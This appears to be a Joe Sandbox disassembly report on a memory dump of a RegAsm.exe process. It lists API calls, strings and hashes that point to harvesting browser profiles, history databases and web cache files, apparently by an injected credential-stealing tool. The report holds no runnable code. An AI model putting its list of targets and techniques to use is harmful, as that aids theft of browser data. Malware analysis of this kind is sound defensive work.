                                                                        • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                        • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                        • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                        • GetLastError.KERNEL32 ref: 0041847E
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@CreateErrorFileLast
                                                                        • String ID: |A
                                                                        • API String ID: 4200628931-1717621600
                                                                        • Opcode ID: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                        • Opcode Fuzzy Hash: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                        APIs
                                                                          • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                        • memset.MSVCRT ref: 004033B7
                                                                        • memcpy.MSVCRT ref: 004033D0
                                                                        • wcscmp.MSVCRT ref: 004033FC
                                                                        • _wcsicmp.MSVCRT ref: 00403439
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                        • String ID: $0.@
                                                                        • API String ID: 3030842498-1896041820
                                                                        • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                        • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                        • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                        • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403C09
                                                                        • memset.MSVCRT ref: 00403C1E
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                        • wcscat.MSVCRT ref: 00403C47
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                        • wcscat.MSVCRT ref: 00403C70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                        • API String ID: 1534475566-1174173950
                                                                        • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                        • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                        • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                        • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 669240632-0
                                                                        • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                        • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                        • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                        • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                        APIs
                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                        • memset.MSVCRT ref: 00414C87
                                                                        • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                        • wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 2925649097-2036018995
                                                                        • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                        • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                        • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                        • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                        APIs
                                                                        • wcschr.MSVCRT ref: 00414458
                                                                        • _snwprintf.MSVCRT ref: 0041447D
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                        • String ID: "%s"
                                                                        • API String ID: 1343145685-3297466227
                                                                        • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                        • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                        • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                        • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004087D6
                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                        • memset.MSVCRT ref: 00408828
                                                                        • memset.MSVCRT ref: 00408840
                                                                        • memset.MSVCRT ref: 00408858
                                                                        • memset.MSVCRT ref: 00408870
                                                                        • memset.MSVCRT ref: 00408888
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 2911713577-0
                                                                        • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                        • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                        • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                        • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp
                                                                        • String ID: @ $SQLite format 3
                                                                        • API String ID: 1475443563-3708268960
                                                                        • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                        • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                        • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                        • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmpqsort
                                                                        • String ID: /nosort$/sort
                                                                        • API String ID: 1579243037-1578091866
                                                                        • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                        • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                        • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                        • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModuleProcessTimes
                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                        • API String ID: 116129598-3385500049
                                                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040E60F
                                                                        • memset.MSVCRT ref: 0040E629
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        Strings
                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                        • API String ID: 2887208581-2114579845
                                                                        APIs
                                                                        • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                        • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 3473537107-0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        Strings
                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                        • API String ID: 2221118986-1725073988
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp
                                                                        • String ID: $$8
                                                                        • API String ID: 1475443563-435121686
                                                                        APIs
                                                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                          • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                          • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                        • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                        • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                        • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                          • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                        • String ID:
                                                                        • API String ID: 2722907921-0
                                                                        APIs
                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                        • memset.MSVCRT ref: 00403A55
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                        • String ID: history.dat$places.sqlite
                                                                        • API String ID: 3093078384-467022611
                                                                        APIs
                                                                          • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                        • GetLastError.KERNEL32 ref: 00417627
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$File$PointerRead
                                                                        • String ID:
                                                                        • API String ID: 839530781-0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID: *.*$index.dat
                                                                        • API String ID: 1974802433-2863569691
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@mallocmemcpy
                                                                        • String ID:
                                                                        • API String ID: 3831604043-0
                                                                        APIs
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                        • GetLastError.KERNEL32 ref: 004175A2
                                                                        • GetLastError.KERNEL32 ref: 004175A8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$FilePointer
                                                                        • String ID:
                                                                        • API String ID: 1156039329-0
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleTime
                                                                        • String ID:
                                                                        • API String ID: 3397143404-0
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                        • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                        • String ID:
                                                                        • API String ID: 1125800050-0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleSleep
                                                                        • String ID: }A
                                                                        • API String ID: 252777609-2138825249
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d
                                                                        • API String ID: 0-2564639436
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: BINARY
                                                                        • API String ID: 2221118986-907554435
                                                                        • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                        • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                        • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                        • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                        APIs
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • _mbscpy.MSVCRT ref: 00405250
                                                                        • _mbscat.MSVCRT ref: 0040525B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 568699880-0
                                                                        • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                        • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                        • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                        • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp
                                                                        • String ID: /stext
                                                                        • API String ID: 2081463915-3817206916
                                                                        • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                        • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                        • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                        • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
